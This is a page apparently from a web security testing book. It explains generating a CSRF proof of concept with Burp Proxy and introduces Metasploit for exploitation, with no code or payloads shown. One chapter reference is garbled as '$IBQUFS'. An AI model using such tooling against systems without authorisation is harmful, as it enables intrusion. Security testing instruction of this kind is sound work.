Other Tools                                                                Chapter 11

            After submitting our form, we can see the request has been successfully intercepted by
            Burp Proxy:
































            Now if you right-click on the intercepted request in Burp Proxy, you can see in the
            dropdown the engagement tools submenu. If you're a free/community user, these options
            will be disabled, but if you're a paid/Pro user, you can select Generate CSRF PoC.

            You can use this CSRF PoC, which is really just a short HTML snippet that reflects the form
            and submission structure of whatever you're testing, to trigger the application state changes
            that will prove the presence of a CSRF vulnerability (so, a PoC). If you have access to this
            functionality, it can be a quick and easy method, but if you don't, it's also easy to replace
            (we generated a CSRF PoC programmatically in $IBQUFS  , CSRF and Insecure Session
            Authentication).


            Metasploit and Exploitation Frameworks

            Metasploit is a popular exploitation framework provided by Rapid7 that, although it
            features a stable of common scanning and proxy features, really shines in the post-
            discovery, exploit-writing phase, when the bug has been found and you're trying to use it
            as the foothold for a larger attack.



                                                    [ 184 ]